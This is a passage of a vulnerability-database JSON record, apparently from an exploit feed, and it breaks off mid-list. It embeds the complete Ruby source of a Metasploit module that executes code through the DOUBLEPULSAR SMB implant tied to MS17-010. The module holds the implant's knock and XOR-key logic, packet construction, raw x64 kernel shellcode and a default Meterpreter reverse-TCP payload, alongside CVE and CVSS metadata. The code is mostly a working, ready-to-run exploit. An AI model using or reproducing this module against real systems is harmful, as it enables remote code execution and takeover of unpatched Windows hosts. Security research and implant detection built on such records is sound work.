["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-28T22:16:48", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27802", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96704", "SMNTC-96706", "SMNTC-96709", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-28T06:15:19", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-28T06:15:19", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-29] #"}, "lastseen": "2021-09-28T22:16:48", "differentElements": ["sourceData"], "edition": 28}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "b3e76f828319e546a06f6ef077d15c7f", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-09-29T22:24:02", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:42030"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952", 